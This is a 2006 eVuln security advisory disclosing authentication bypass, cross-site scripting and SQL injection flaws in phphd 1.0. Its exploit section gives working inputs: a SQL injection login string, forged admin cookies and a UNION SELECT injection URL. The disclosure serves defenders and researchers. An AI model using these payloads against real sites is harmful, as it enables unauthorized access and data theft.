New eVuln Advisory: phphd Multiple Vulnerabilities http://evuln.com/vulns/60/summary.html --------------------Summary---------------- eVuln ID: EV0060 CVE: CVE-2006-0607 CVE-2006-0608 CVE-2006-0609 Vendor: Hinton Design Vendor's Web Site: http://www.hintondesign.org Software: phphd Sowtware's Web Site: http://www.hintondesign.org/downloads/view_cat.php?cat_id=91 Versions: 1.0 Critical Level: Moderate Type: Multiple Vulnerabilities Class: Remote Status: Unpatched. No reply from developer(s) Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) -----------------Description--------------- 1. Authentication Bypass Vulnerable script: check.php There are two ways to bypass authentication: a) SQL Injection Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. Condition: magic_quotes_gpc - off b) Cookie based authentication check.php script dont make password comparisson when identifying user by cookies 2. Multiple Cross-Site Scripting Vulnerable script: add.php Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code. 3. Multiple SQL Injections Vulnerable scripts: all scripts showing some data from database Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code. Condition: magic_quotes_gpc - off --------------Exploit---------------------- Available at: http://evuln.com/vulns/60/exploit.html 1. Authentication Bypass a) SQL Injection url: http://host/ht/login.php Username: ' or 1/* Password: any b) Cookie based authentication Cookie: loged=yes Cookie: username=admin Cookie: user_level=1 Cookie: userid=1 Cookie: email=aaa@aaa.com 2. Cross-Site Scripting Example. Url: http://host/phphd/add.php Download_name: Version: Download Description: 3. SQL Injection Example: http://host/phphd/view_link.php? file_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15/* --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)